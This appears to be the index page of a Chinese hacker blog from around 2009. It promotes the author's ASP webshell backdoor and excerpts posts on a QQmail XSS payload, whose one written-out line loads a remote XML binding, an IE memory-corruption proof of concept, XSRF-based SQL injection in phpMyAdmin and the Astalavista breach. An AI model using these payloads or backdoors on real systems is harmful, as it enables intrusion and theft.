导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

QQmail Multiple Xss Vulnerabilities

1. firefox2 css xss vulnerabilities
 
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
 
test.xml:
 
<?xml version="1.0"?>
<bindings xmlns="http

hacked, including details

这里就不发全文了,全文放到txt里了,地址:astalavista_hacked.txt

The Hacking & Security Community

[+] Founded in 1997 by a hacker computer enthusiast

[-] Exposed in 2009 by anti-sec group

 

From < http://astalavista.com/faq>:

XCon2009 安全焦点信息安全技术峰会议题征集函

XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿,参加会议,共享精彩盛会。

参加会议对象:

任何热爱信息安全的人士,包括如信息安全专家,信息安全爱好者, 网络

管理工程师,网络安全顾问, CIO,黑客技术发烧友等

....

Windows Eventlog Fun with Free Tools

This week at work I was asked to find why a specific account was constantly being locked out. Sounds pretty easy eh. Well the thing is, this was a service account and I have quite a lot of DC's where this could be happening from.



I did a little research on my favorite site www.ultimatewindowssecurity.com and ran a few tests to make sure I new what I was looking for

....

server limit dos

墨西哥同学周末很郁闷的在宾馆上网,发现youtube被ban了,于是写个了tool解决这个问题。顺带想到了一种利用 google 统计的漏洞,写在这里了

http://sirdarckcat.blogspot.com/2009/04/how-to-use-google-analytics-to-dos.html

这个问题实际上是由于 webserver 的 request field limit 造成的。

当 http request header 过长时,webserver 会产生一个400 或者 4xx 错误

 

Your browser sent a request that this server could not understand.

Size of a request header field exceeds server limit.

MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)

明生注:将他保存为html然后打开试试,哈哈。好玩

<!--

MS09-014: MSIE EMBED element race condition memory corruption

Code by SkyLined <berendjanwever@gmail.com>

http://skypher.com/SkyLined/Repro/MSIE/EMBED%20memory%20corruption/repro3.html

http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption

-->

.....

基于XSRF的SQL注入技术

本文将向读者介绍一种基于跨站请求伪造的SQL注入技术。PhpMyAdmin是目前最流行的PHP项目,在现实中PhpMyAdmin已被大量采用。今年12月初,人们在PhpMyAdmin的3.1.0版本中发现了一个漏洞,不过这个漏洞的利用方法有些特别,那就是需要利用跨站请求伪造来进行SQL注入。本文将向读者介绍受影响的版本以及对这些版本软件的具体攻击方法,最后对出现漏洞的代码进行了详细的分析。

 

一、漏洞描述

 

phpMyAdmin 是一种 MySQL 数据库的管理工具,安装该工具后,即可以通过 web 形式直接管理 MySQL 数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,所以目前非常流行。不过,今年十二月初,人们在3.1.0版本的phpMyAdmin上发现了一个安全漏洞,攻击者可以通过XSRF对phpMyAdmin进行SQL 注入攻击。并且无论magic_quotes_gpc被设为On或者Off,该漏洞仍然会被利用。

二、漏洞利用代码

...

Active Man in the Middle Attacks

转自TR博客

Trace: 我怎么感觉只是换了个叫法呢?

Adi Sharabani, manager of our own IBM Rational Security Group, gave a keynote presentation on the subject of Active Man in the Middle attacks at the recent OWASP AU conference that was held yesterday.

...

十大网络黑客技术的2008年(正式版)

从TR博客中,然后用软件翻译的..拼凑就可以明白了

我们搜寻了深远和广泛收集许多网络黑客技术在2008年出版尽可能- 〜 70的所有。 These new and innovative techniques were analyzed and ranked based upon their novelty, impact, and pervasiveness.这些新的和创新的技术进行了分析和排名根据其新颖性,影响和渗透。 The 2008 competition was exceptionally fierce and our panel of judges ( Rich Mogull , Chris Hoff , HD Moore , and Jeff Forristal ) had their work cut out for them. 2008年竞争格外激烈,我们的法官小组( 富Mogull克里斯霍夫高清摩尔 Jeff Forristal )的工作等着他们。 For any researcher, or "breaker" if you prefer, simply the act of creating something unique enough to appear on the list is no small feat.对于任何研究人员,或“断路器”如果你愿意,只要该行为创造一些独特的,足以显示在列表中是一项不小的壮举。 That much should be considered an achievement.这一点应被视为一项成就。 In the end, ten Web hacking techniques rose head and shoulders above.最后, 10网络黑客技术上升头部和肩部以上。

...

分页:[«]1[»]

日历

<< 2010-7 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved